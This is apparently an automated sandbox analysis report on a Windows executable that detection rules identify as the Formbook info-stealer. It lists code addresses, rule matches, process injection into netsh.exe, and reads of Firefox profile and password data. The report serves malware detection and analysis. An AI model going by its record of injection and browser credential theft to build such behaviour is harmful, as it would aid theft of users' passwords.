            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110C7C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112C6E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01126962
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011129A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011DA9A6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111A840
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01112840
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F68B8
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E8F0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CAB40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C6BD7
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110EA80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011ACD1F
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111AD00
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01128DBF
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110ADE0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110C00
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0CB5
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100CF2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01130F30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B2F30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01152F28
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01184F40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118EFA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01102FC8
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CEE26
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110E59
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01122E90
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CCE93
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CEEDB
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011DB16B
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114516C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FF172
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111B1B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011170C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BF0CC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C70E9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CF0E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C132D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FD34C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0115739A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011152A0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112B2C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112D2F0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B12ED
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C7571
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AD5B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D95C3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CF43F
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01101460
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CF7B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01155630
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C16CC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A5910
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01119950
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112B950
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117D800
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011138E0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CFB76
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112FB80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01185BF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114DBF9
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CFA49
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C7A46
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01183A6C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01155AA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011ADAAC
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B1AA3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BDAC6
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C1D5A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01113D40
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C7D73
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112FDC0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01189C32
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CFCF2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CFF09
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01111F92
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CFFB1
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D3FD5
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D3FD2
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01119EB0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038403E6
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0378E3F0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383A352
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038002C0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03820274
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038341A2
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038401AA
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038381CC
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03770100
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0381A118
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03808158
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03812000
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03780770
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037A4750
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0377C7C0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379C6E0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03840591
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03780535
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0382E4F6
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03824420
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03832446
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03836BD7
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383AB40
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0377EA80
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03796962
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0384A9A6
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037829A0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0378A840
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03782840
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037AE8F0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037668B8
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037F4F40
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037A0F30
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037C2F28
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03822F30
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03772FC8
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037FEFA0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383CE93
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03780E59
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383EEDB
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383EE26
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03792E90
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0378AD00
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0377ADE0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0381CD1F
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03798DBF
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03820CB5
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03780C00
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03770CF2
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0376D34C
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383132D
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037C739A
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038212ED
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379D2F0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379B2C0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037852A0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0376F172
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B516C
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0378B1B0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0384B16B
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0382F0CC
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383F0E0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038370E9
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037870C0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383F7B0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037C5630
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038316CC
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0381D5B0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_038495C3
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03837571
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03771460
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383F43F
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037BDBF9
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037F5BF0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FB76
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379FB80
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037F3A6C
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03821AA3
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0381DAAC
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0382DAC6
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03837A46
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FA49
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037C5AA0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03789950
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379B950
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03815910
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037ED800
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037838E0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FFB1
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FF09
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03781F92
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03789EB0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03783D40
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0379FDC0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03831D5A
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03837D73
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037F9C32
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_0383FCF2
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C111D0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0C390
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0C5B0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0A62D
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0A630
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C12D30
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C29D70
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 01145130 appears 58 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 010FB970 appears 262 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 01157E54 appears 107 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 0117EA12 appears 86 times
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: String function: 0118F290 appears 103 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037C7E54 appears 107 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037FF290 appears 103 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0376B970 appears 262 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037B5130 appears 58 times
            Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037EEA12 appears 86 times
            Source: yZcecBUXN7.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: yZcecBUXN7.exe, 00000000.00000002.1626357622.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1626915170.0000000003A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000000.1623598827.00000000006D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegrpconv.exel% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000011FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exeBinary or memory string: OriginalFilenamegrpconv.exel% vs yZcecBUXN7.exe
            Source: yZcecBUXN7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.5140000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.2a7f368.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.yZcecBUXN7.exe.2a81ba8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: yZcecBUXN7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/12
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yZcecBUXN7.exe.logJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\netsh.exeFile created: C:\Users\user\AppData\Local\Temp\1-00F23LJump to behavior
            Source: yZcecBUXN7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: yZcecBUXN7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4123105715.0000000000FC5000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.2195893631.0000000000FE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: yZcecBUXN7.exeReversingLabs: Detection: 28%
            Source: yZcecBUXN7.exeVirustotal: Detection: 37%
            Source: unknownProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: mscoree.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: version.dll
